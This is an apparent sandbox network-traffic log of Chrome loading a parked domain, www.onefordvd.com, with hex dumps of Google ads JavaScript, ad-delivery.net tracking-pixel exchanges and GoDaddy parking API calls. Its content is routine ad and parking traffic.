                                                                          2024-08-29 15:12:18 UTC545INData Raw: 69 66 28 21 77 69 6e 64 6f 77 5b 27 67 6f 6f 67 6c 65 4e 44 54 5f 27 5d 29 7b 77 69 6e 64 6f 77 5b 27 67 6f 6f 67 6c 65 4e 44 54 5f 27 5d 3d 28 6e 65 77 20 44 61 74 65 28 29 29 2e 67 65 74 54 69 6d 65 28 29 3b 7d 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 41 6c 74 4c 6f 61 64 65 72 3d 33 3b 76 61 72 20 73 66 66 65 44 61 74 61 5f 3d 7b 73 65 72 76 69 63 65 5f 68 6f 73 74 3a 22 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 2c 68 61 73 68 3a 22 31 32 30 30 30 38 36 37 35 38 31 34 38 36 32 32 33 32 35 35 22 2c 70 61 63 6b 61 67 65 73 3a 22 64 6f 6d 61 69 6e 73 22 2c 6d 6f 64 75 6c 65 3a 22 61 64 73 22 2c 76 65 72 73 69 6f 6e 3a 22 31 22 2c 6d 3a 7b 63 65 69 3a 22 31 37 33 30 31 34 33 37 2c 31 37 33 30 31 34 33 39 2c 31 37 33
                                                                          Data Ascii: if(!window['googleNDT_']){window['googleNDT_']=(new Date()).getTime();}(function() {window.googleAltLoader=3;var sffeData_={service_host:"www.google.com",hash:"12000867581486223255",packages:"domains",module:"ads",version:"1",m:{cei:"17301437,17301439,173
                                                                          2024-08-29 15:12:18 UTC1390INData Raw: 6f 6d 61 69 6e 22 3a 74 72 75 65 2c 22 5f 77 61 69 74 4f 6e 43 6f 6e 73 65 6e 74 46 6f 72 46 69 72 73 74 50 61 72 74 79 43 6f 6f 6b 69 65 22 3a 74 72 75 65 2c 22 65 6e 61 62 6c 65 45 6e 68 61 6e 63 65 64 54 61 72 67 65 74 69 6e 67 52 73 6f 6e 63 22 3a 74 72 75 65 2c 22 65 6e 61 62 6c 65 4e 6f 6e 62 6c 6f 63 6b 69 6e 67 53 61 73 43 6f 6f 6b 69 65 22 3a 74 72 75 65 7d 2c 6d 64 70 3a 31 38 30 30 30 30 30 2c 73 73 64 6c 3a 22 59 58 42 77 63 33 42 76 64 43 35 6a 62 32 30 73 59 6d 78 76 5a 33 4e 77 62 33 51 75 59 32 39 74 4c 47 4a 79 4c 6d 4e 76 62 53 78 6a 62 79 35 6a 62 32 30 73 59 32 78 76 64 57 52 6d 63 6d 39 75 64 43 35 75 5a 58 51 73 5a 58 55 75 59 32 39 74 4c 47 68 76 63 48 52 76 4c 6d 39 79 5a 79 78 70 62 69 35 75 5a 58 51 73 64 48 4a 68 62 6e 4e 73 59
                                                                          Data Ascii: omain":true,"_waitOnConsentForFirstPartyCookie":true,"enableEnhancedTargetingRsonc":true,"enableNonblockingSasCookie":true},mdp:1800000,ssdl:"YXBwc3BvdC5jb20sYmxvZ3Nwb3QuY29tLGJyLmNvbSxjby5jb20sY2xvdWRmcm9udC5uZXQsZXUuY29tLGhvcHRvLm9yZyxpbi5uZXQsdHJhbnNsY
                                                                          2024-08-29 15:12:18 UTC1390INData Raw: 6d 70 5f 73 79 6d 62 6f 6c 5f 22 2b 28 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2a 31 45 39 3e 3e 3e 30 29 2b 22 5f 22 2c 65 3d 30 3b 72 65 74 75 72 6e 20 62 7d 29 3b 0a 71 28 22 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 29 72 65 74 75 72 6e 20 61 3b 61 3d 53 79 6d 62 6f 6c 28 22 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 22 29 3b 66 6f 72 28 76 61 72 20 62 3d 22 41 72 72 61 79 20 49 6e 74 38 41 72 72 61 79 20 55 69 6e 74 38 41 72 72 61 79 20 55 69 6e 74 38 43 6c 61 6d 70 65 64 41 72 72 61 79 20 49 6e 74 31 36 41 72 72 61 79 20 55 69 6e 74 31 36 41 72 72 61 79 20 49 6e 74 33 32 41 72 72 61 79 20 55 69 6e 74 33 32 41 72 72 61 79 20 46 6c 6f 61 74 33 32 41 72 72 61 79 20 46 6c 6f 61 74 36 34 41 72 72
                                                                          Data Ascii: mp_symbol_"+(Math.random()*1E9>>>0)+"_",e=0;return b});q("Symbol.iterator",function(a){if(a)return a;a=Symbol("Symbol.iterator");for(var b="Array Int8Array Uint8Array Uint8ClampedArray Int16Array Uint16Array Int32Array Uint32Array Float32Array Float64Arr
                                                                          2024-08-29 15:12:18 UTC1390INData Raw: 69 66 28 63 21 3d 22 70 72 6f 74 6f 74 79 70 65 22 29 69 66 28 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 29 7b 76 61 72 20 64 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 62 2c 63 29 3b 64 26 26 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 61 2c 63 2c 64 29 7d 65 6c 73 65 20 61 5b 63 5d 3d 62 5b 63 5d 3b 61 2e 70 67 3d 62 2e 70 72 6f 74 6f 74 79 70 65 7d 66 75 6e 63 74 69 6f 6e 20 71 61 28 29 7b 66 6f 72 28 76 61 72 20 61 3d 4e 75 6d 62 65 72 28 74 68 69 73 29 2c 62 3d 5b 5d 2c 63 3d 61 3b 63 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 63 2b 2b 29 62 5b 63 2d 61 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 63 5d 3b 72 65 74 75 72 6e 20 62 7d 0a 71 28 22
                                                                          Data Ascii: if(c!="prototype")if(Object.defineProperties){var d=Object.getOwnPropertyDescriptor(b,c);d&&Object.defineProperty(a,c,d)}else a[c]=b[c];a.pg=b.prototype}function qa(){for(var a=Number(this),b=[],c=a;c<arguments.length;c++)b[c-a]=arguments[c];return b}q("
                                                                          2024-08-29 15:12:18 UTC1390INData Raw: 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 74 68 69 73 2e 67 67 28 68 2c 67 29 3a 74 68 69 73 2e 4a 64 28 67 29 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 59 63 3d 66 75 6e 63 74 69 6f 6e 28 67 29 7b 74 68 69 73 2e 61 65 28 32 2c 67 29 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 4a 64 3d 66 75 6e 63 74 69 6f 6e 28 67 29 7b 74 68 69 73 2e 61 65 28 31 2c 67 29 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 61 65 3d 66 75 6e 63 74 69 6f 6e 28 67 2c 68 29 7b 69 66 28 74 68 69 73 2e 42 21 3d 30 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 73 65 74 74 6c 65 28 22 2b 67 2b 22 2c 20 22 2b 68 2b 22 29 3a 20 50 72 6f 6d 69 73 65 20 61 6c 72 65 61 64 79 20 73 65 74 74 6c 65 64 20 69 6e 20 73 74 61 74 65 22 2b 74 68 69 73 2e 42 29 3b 74 68 69 73 2e 42 3d 67 3b
                                                                          Data Ascii: =="function"?this.gg(h,g):this.Jd(g)};b.prototype.Yc=function(g){this.ae(2,g)};b.prototype.Jd=function(g){this.ae(1,g)};b.prototype.ae=function(g,h){if(this.B!=0)throw Error("Cannot settle("+g+", "+h+"): Promise already settled in state"+this.B);this.B=g;
                                                                          2024-08-29 15:12:18 UTC1390INData Raw: 2c 0a 68 29 7b 66 75 6e 63 74 69 6f 6e 20 6b 28 29 7b 73 77 69 74 63 68 28 6c 2e 42 29 7b 63 61 73 65 20 31 3a 67 28 6c 2e 55 61 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 3a 68 28 6c 2e 55 61 29 3b 62 72 65 61 6b 3b 64 65 66 61 75 6c 74 3a 74 68 72 6f 77 20 45 72 72 6f 72 28 22 55 6e 65 78 70 65 63 74 65 64 20 73 74 61 74 65 3a 20 22 2b 6c 2e 42 29 3b 7d 7d 76 61 72 20 6c 3d 74 68 69 73 3b 74 68 69 73 2e 7a 61 3d 3d 6e 75 6c 6c 3f 66 2e 75 64 28 6b 29 3a 74 68 69 73 2e 7a 61 2e 70 75 73 68 28 6b 29 3b 74 68 69 73 2e 4d 64 3d 21 30 7d 3b 62 2e 72 65 73 6f 6c 76 65 3d 64 3b 62 2e 72 65 6a 65 63 74 3d 66 75 6e 63 74 69 6f 6e 28 67 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 62 28 66 75 6e 63 74 69 6f 6e 28 68 2c 6b 29 7b 6b 28 67 29 7d 29 7d 3b 62 2e 72 61 63 65
                                                                          Data Ascii: ,h){function k(){switch(l.B){case 1:g(l.Ua);break;case 2:h(l.Ua);break;default:throw Error("Unexpected state: "+l.B);}}var l=this;this.za==null?f.ud(k):this.za.push(k);this.Md=!0};b.resolve=d;b.reject=function(g){return new b(function(h,k){k(g)})};b.race
                                                                          2024-08-29 15:12:18 UTC1390INData Raw: 65 3d 62 2e 6c 65 6e 67 74 68 3b 65 3e 30 26 26 63 3e 30 3b 29 69 66 28 64 5b 2d 2d 63 5d 21 3d 62 5b 2d 2d 65 5d 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 20 65 3c 3d 30 7d 7d 29 3b 0a 71 28 22 57 65 61 6b 4d 61 70 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 6b 29 7b 74 68 69 73 2e 4b 61 3d 28 68 2b 3d 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2b 31 29 2e 74 6f 53 74 72 69 6e 67 28 29 3b 69 66 28 6b 29 7b 6b 3d 75 28 6b 29 3b 66 6f 72 28 76 61 72 20 6c 3b 21 28 6c 3d 6b 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 6c 3d 6c 2e 76 61 6c 75 65 2c 74 68 69 73 2e 73 65 74 28 6c 5b 30 5d 2c 6c 5b 31 5d 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 64 28 6b 29 7b 76 61 72 20 6c 3d 74 79 70 65 6f
                                                                          Data Ascii: e=b.length;e>0&&c>0;)if(d[--c]!=b[--e])return!1;return e<=0}});q("WeakMap",function(a){function b(k){this.Ka=(h+=Math.random()+1).toString();if(k){k=u(k);for(var l;!(l=k.next()).done;)l=l.value,this.set(l[0],l[1])}}function c(){}function d(k){var l=typeo
                                                                          2024-08-29 15:12:18 UTC1390INData Raw: 6c 3d 6c 2e 6e 65 78 74 2c 7b 64 6f 6e 65 3a 21 31 2c 76 61 6c 75 65 3a 6b 28 6c 29 7d 3b 6c 3d 6e 75 6c 6c 7d 72 65 74 75 72 6e 7b 64 6f 6e 65 3a 21 30 2c 76 61 6c 75 65 3a 76 6f 69 64 20 30 7d 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 64 28 68 2c 6b 29 7b 76 61 72 20 6c 3d 6b 26 26 74 79 70 65 6f 66 20 6b 3b 6c 3d 3d 22 6f 62 6a 65 63 74 22 7c 7c 6c 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 66 2e 68 61 73 28 6b 29 3f 6c 3d 66 2e 67 65 74 28 6b 29 3a 28 6c 3d 22 22 2b 20 2b 2b 67 2c 66 2e 73 65 74 28 6b 2c 6c 29 29 3a 6c 3d 22 70 5f 22 2b 6b 3b 76 61 72 20 6e 3d 68 5b 30 5d 5b 6c 5d 3b 69 66 28 6e 26 26 72 61 28 68 5b 30 5d 2c 6c 29 29 66 6f 72 28 68 3d 30 3b 68 3c 6e 2e 6c 65 6e 67 74 68 3b 68 2b 2b 29 7b 76 61 72 20 70 3d 6e 5b 68 5d 3b 69 66 28 6b 21 3d 3d 6b
                                                                          Data Ascii: l=l.next,{done:!1,value:k(l)};l=null}return{done:!0,value:void 0}})}function d(h,k){var l=k&&typeof k;l=="object"||l=="function"?f.has(k)?l=f.get(k):(l=""+ ++g,f.set(k,l)):l="p_"+k;var n=h[0][l];if(n&&ra(h[0],l))for(h=0;h<n.length;h++){var p=n[h];if(k!==k
                                                                          2024-08-29 15:12:18 UTC1390INData Raw: 6e 28 29 7b 74 68 69 73 5b 30 5d 3d 7b 7d 3b 74 68 69 73 5b 31 5d 3d 74 68 69 73 5b 31 5d 2e 58 3d 62 28 29 3b 74 68 69 73 2e 73 69 7a 65 3d 30 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 72 65 74 75 72 6e 21 21 64 28 74 68 69 73 2c 68 29 2e 49 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 72 65 74 75 72 6e 28 68 3d 64 28 74 68 69 73 2c 68 29 2e 49 29 26 26 68 2e 76 61 6c 75 65 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 68 29 7b 72 65 74 75 72 6e 5b 68 2e 6b 65 79 2c 68 2e 76 61 6c 75 65 5d 7d 29 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 6b 65
                                                                          Data Ascii: n(){this[0]={};this[1]=this[1].X=b();this.size=0};e.prototype.has=function(h){return!!d(this,h).I};e.prototype.get=function(h){return(h=d(this,h).I)&&h.value};e.prototype.entries=function(){return c(this,function(h){return[h.key,h.value]})};e.prototype.ke
                                                                          2024-08-29 15:12:18 UTC1390INData Raw: 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 61 3a 7b 76 61 72 20 64 3d 74 68 69 73 3b 64 20 69 6e 73 74 61 6e 63 65 6f 66 20 53 74 72 69 6e 67 26 26 28 64 3d 53 74 72 69 6e 67 28 64 29 29 3b 66 6f 72 28 76 61 72 20 65 3d 64 2e 6c 65 6e 67 74 68 2c 66 3d 30 3b 66 3c 65 3b 66 2b 2b 29 7b 76 61 72 20 67 3d 64 5b 66 5d 3b 69 66 28 62 2e 63 61 6c 6c 28 63 2c 67 2c 66 2c 64 29 29 7b 62 3d 67 3b 62 72 65 61 6b 20 61 7d 7d 62 3d 76 6f 69 64 20 30 7d 72 65 74 75 72 6e 20 62 7d 7d 29 3b 71 28 22 4f 62 6a 65 63 74 2e 76 61 6c 75 65 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 63 3d 5b 5d 2c 64 3b 66 6f 72 28 64 20 69 6e 20 62 29 72 61 28 62 2c 64 29 26 26 63 2e
                                                                          Data Ascii: turn a?a:function(b,c){a:{var d=this;d instanceof String&&(d=String(d));for(var e=d.length,f=0;f<e;f++){var g=d[f];if(b.call(c,g,f,d)){b=g;break a}}b=void 0}return b}});q("Object.values",function(a){return a?a:function(b){var c=[],d;for(d in b)ra(b,d)&&c.


                                                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                           8 | 192.168.2.5 | 53755 | 172.67.69.19 | 443 | 4040 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                           Timestamp | Bytes transferred | Direction | Data
                                                                           2024-08-29 15:12:19 UTC | 608 | OUT | GET /px.gif?ch=1&e=0.7550573385120041 HTTP/1.1
                                                                          Host: ad-delivery.net
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://www.onefordvd.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                           2024-08-29 15:12:19 UTC | 1218 | IN | HTTP/1.1 200 OK
                                                                          Date: Thu, 29 Aug 2024 15:12:19 GMT
                                                                          Content-Type: image/gif
                                                                          Content-Length: 43
                                                                          Connection: close
                                                                          X-GUploader-UploadID: ABPtcPpGQj4M5XWsw0_afNd_e9OGg14LZRJ1uEm-mT1UqcHm2kBDuQd0t4vHO2_h4el5IlQxZBc
                                                                          x-goog-generation: 1620242732037093
                                                                          x-goog-metageneration: 5
                                                                          x-goog-stored-content-encoding: identity
                                                                          x-goog-stored-content-length: 43
                                                                          x-goog-hash: crc32c=cpEfJQ==
                                                                          x-goog-hash: md5=rUsPYG4PhGW8TEwXCzfhow==
                                                                          x-goog-storage-class: MULTI_REGIONAL
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Expose-Headers: *, Content-Length, Date, Server, Transfer-Encoding, X-GUploader-UploadID, X-Google-Trace
                                                                          Expires: Fri, 30 Aug 2024 15:12:19 GMT
                                                                          Cache-Control: public, max-age=86400
                                                                          Age: 776864
                                                                          Last-Modified: Wed, 05 May 2021 19:25:32 GMT
                                                                          ETag: "ad4b0f606e0f8465bc4c4c170b37e1a3"
                                                                          CF-Cache-Status: HIT
                                                                          Accept-Ranges: bytes
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LZ8JcUi4DFNk8y7Myq24F31qRBOPIcH9sz3ffBobrgTvgzjWErvfPfuhmw5LM3LUAGyPl1oqLG1bY9DNCUoqNOZYyy166R30duHfXZ03xpwi1pCuHCUyrTsjcmjS%2FaWF7g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8bad7a8949174402-EWR
                                                                           2024-08-29 15:12:19 UTC | 43 | IN | Data Raw: 47 49 46 38 39 61 01 00 01 00 80 01 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b
                                                                          Data Ascii: GIF89a!,L;


                                                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                           9 | 192.168.2.5 | 53756 | 172.67.69.19 | 443 | 4040 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                           Timestamp | Bytes transferred | Direction | Data
                                                                           2024-08-29 15:12:19 UTC | 688 | OUT | GET /px.gif?ch=2 HTTP/1.1
                                                                          Host: ad-delivery.net
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://www.onefordvd.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          If-None-Match: "ad4b0f606e0f8465bc4c4c170b37e1a3"
                                                                          If-Modified-Since: Wed, 05 May 2021 19:25:32 GMT
                                                                           2024-08-29 15:12:19 UTC | 1161 | IN | HTTP/1.1 304 Not Modified
                                                                          Date: Thu, 29 Aug 2024 15:12:19 GMT
                                                                          Connection: close
                                                                          X-GUploader-UploadID: ABPtcPpGQj4M5XWsw0_afNd_e9OGg14LZRJ1uEm-mT1UqcHm2kBDuQd0t4vHO2_h4el5IlQxZBc
                                                                          x-goog-generation: 1620242732037093
                                                                          x-goog-metageneration: 5
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 43
x-goog-hash: crc32c=cpEfJQ==
x-goog-hash: md5=rUsPYG4PhGW8TEwXCzfhow==
x-goog-storage-class: MULTI_REGIONAL
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: *, Content-Length, Date, Server, Transfer-Encoding, X-GUploader-UploadID, X-Google-Trace
Expires: Fri, 30 Aug 2024 15:12:19 GMT
Cache-Control: public, max-age=86400
Age: 778996
Last-Modified: Wed, 05 May 2021 19:25:32 GMT
ETag: "ad4b0f606e0f8465bc4c4c170b37e1a3"
CF-Cache-Status: HIT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PBaQ8WA6QLXG9nfTNGanFnmfT3HGL2kiQHUOUoDlrVu9T8cKDeZLkb10KWpo5oZm7fJ%2BH2Brg0oPvkpiNjKtZluYcOSUYWP3NsWZs5kMbMebW65gXjY4N6fhASffFrDyow%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8bad7a894aa041e6-EWR


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.5 | 53758 | 54.174.215.77 | 443 | 4040 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-08-29 15:12:19 UTC | 587 | OUT | OPTIONS /v1/domains/domain?domain=www.onefordvd.com&portfolioId=&abp=1&gdabp=true HTTP/1.1
Host: api.aws.parking.godaddy.com
Connection: keep-alive
Accept: */*
Access-Control-Request-Method: GET
Access-Control-Request-Headers: x-request-id
Origin: https://www.onefordvd.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
Sec-Fetch-Dest: empty
Referer: https://www.onefordvd.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2024-08-29 15:12:20 UTC | 748 | IN | HTTP/1.1 200 OK
Date: Thu, 29 Aug 2024 15:12:19 GMT
Content-Length: 0
Connection: close
Set-Cookie: AWSALB=K34XpDYj6/3/+b6yawraZJySYkm7J1V50U2eGGbSeFNViBwfK8/fbrmXexN8SKhPX1rRTI+6TYoMdEStJlMD2F3NHsfuCBLXjJSnzzF8TIq/7XJNWifKUC1IMSPu; Expires=Thu, 05 Sep 2024 15:12:19 GMT; Path=/
Set-Cookie: AWSALBCORS=K34XpDYj6/3/+b6yawraZJySYkm7J1V50U2eGGbSeFNViBwfK8/fbrmXexN8SKhPX1rRTI+6TYoMdEStJlMD2F3NHsfuCBLXjJSnzzF8TIq/7XJNWifKUC1IMSPu; Expires=Thu, 05 Sep 2024 15:12:19 GMT; Path=/; SameSite=None; Secure
access-control-allow-credentials: true
access-control-allow-headers: X-Request-Id
access-control-allow-methods: GET, HEAD, OPTIONS
access-control-allow-origin: https://www.onefordvd.com
access-control-max-age: 600
x-request-id: yzjmqzA-


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.5 | 53759 | 54.174.215.77 | 443 | 4040 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-08-29 15:12:20 UTC | 683 | OUT | GET /v1/domains/domain?domain=www.onefordvd.com&portfolioId=&abp=1&gdabp=true HTTP/1.1
Host: api.aws.parking.godaddy.com
Connection: keep-alive
sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
X-Request-Id: 29c03105-bfe3-4210-967e-5295b3a100a0
sec-ch-ua-platform: "Windows"
Accept: */*
Origin: https://www.onefordvd.com
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.onefordvd.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2024-08-29 15:12:20 UTC | 884 | IN | HTTP/1.1 200 OK
Date: Thu, 29 Aug 2024 15:12:20 GMT
Content-Type: application/json
Content-Length: 987
Connection: close
Set-Cookie: AWSALB=qNcHV6v+0AkVlpZCqrqfePEbwgAMWYft4zF3hak3Jf3/AWFFjVd8TQKdq2V2LWgI+a76dOeioMcinVc60/OIlvf37OksIRWebQzVT6WVuoMWXglfDIGCGqQyqCri; Expires=Thu, 05 Sep 2024 15:12:20 GMT; Path=/
Set-Cookie: AWSALBCORS=qNcHV6v+0AkVlpZCqrqfePEbwgAMWYft4zF3hak3Jf3/AWFFjVd8TQKdq2V2LWgI+a76dOeioMcinVc60/OIlvf37OksIRWebQzVT6WVuoMWXglfDIGCGqQyqCri; Expires=Thu, 05 Sep 2024 15:12:20 GMT; Path=/; SameSite=None; Secure
access-control-allow-credentials: true
access-control-allow-origin: https://www.onefordvd.com
access-control-max-age: 600
cache-control: Private,max-age=86400
set-cookie: cpvisitor=54cec57b-23c2-4985-a1b2-a1bcd359fb0e; Path=/; Expires=Sat, 28 Sep 2024 15:12:20 GMT; Secure; SameSite=None
x-request-id: 29c03105-bfe3-4210-967e-5295b3a100a0
2024-08-29 15:12:20 UTC | 987 | IN | Data Raw: 7b 22 73 79 73 74 65 6d 22 3a 22 53 4e 22 2c 22 61 63 63 6f 75 6e 74 22 3a 22 31 31 64 31 64 65 66 35 33 34 65 61 31 62 65 30 58 34 33 31 36 32 39 33 66 58 31 35 62 63 62 63 65 35 31 30 62 58 58 32 66 38 65 20 22 2c 22 63 75 73 74 6f 6d 65 72 49 64 22 3a 22 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 22 2c 22 64 69 73 70 6c 61 79 54 79 70 65 22 3a 22 41 44 53 22 2c 22 64 61 74 61 53 6f 75 72 63 65 22 3a 22 49 4e 56 45 4e 54 4f 52 59 22 2c 22 61 64 53 65 6e 73 65 22 3a 7b 22 64 72 69 64 22 3a 22 61 73 2d 64 72 69 64 2d 32 34 31 32 37 30 38 38 37 34 33 33 33 35 34 38 22 2c 22 63 68 61 6e 6e 65 6c 22 3a 22 30 36 39 30 32 22 2c 22 70 75 62 49 64 22 3a 22 64 70 2d 6e 61 6d 65 6d 65 64 69 61 30 36
Data Ascii: {"system":"SN","account":"11d1def534ea1be0X4316293fX15bcbce510bXX2f8e ","customerId":"00000000-0000-0000-0000-000000000000","displayType":"ADS","dataSource":"INVENTORY","adSense":{"drid":"as-drid-2412708874333548","channel":"06902","pubId":"dp-namemedia06


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.5 | 53763 | 104.26.2.70 | 443 | 4040 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-08-29 15:12:20 UTC | 371 | OUT | GET /px.gif?ch=1&e=0.7379176731179411 HTTP/1.1
Host: ad-delivery.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept: */*
Sec-Fetch-Site: none
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2024-08-29 15:12:21 UTC | 1226 | IN | HTTP/1.1 200 OK
Date: Thu, 29 Aug 2024 15:12:20 GMT
Content-Type: image/gif
Content-Length: 43
Connection: close
X-GUploader-UploadID: ABPtcPpGQj4M5XWsw0_afNd_e9OGg14LZRJ1uEm-mT1UqcHm2kBDuQd0t4vHO2_h4el5IlQxZBc
x-goog-generation: 1620242732037093
x-goog-metageneration: 5
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 43
x-goog-hash: crc32c=cpEfJQ==
x-goog-hash: md5=rUsPYG4PhGW8TEwXCzfhow==
x-goog-storage-class: MULTI_REGIONAL
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: *, Content-Length, Date, Server, Transfer-Encoding, X-GUploader-UploadID, X-Google-Trace
Expires: Fri, 30 Aug 2024 15:12:20 GMT
Cache-Control: public, max-age=86400
Age: 778387
Last-Modified: Wed, 05 May 2021 19:25:32 GMT
ETag: "ad4b0f606e0f8465bc4c4c170b37e1a3"
CF-Cache-Status: HIT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XnJQqlPgPzU0dBq4tCQhaj2RMH46d268P3IipaOYywI9zufu9KQp5MxG4d3dUKjNuFB8xJzIaQAeHYagFAFRhZg%2BmWt4P2C5RDu%2B%2FSlRRfjGaM7Z7MoHReTCdh%2F2%2Fs1uxw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8bad7a932f84c431-EWR
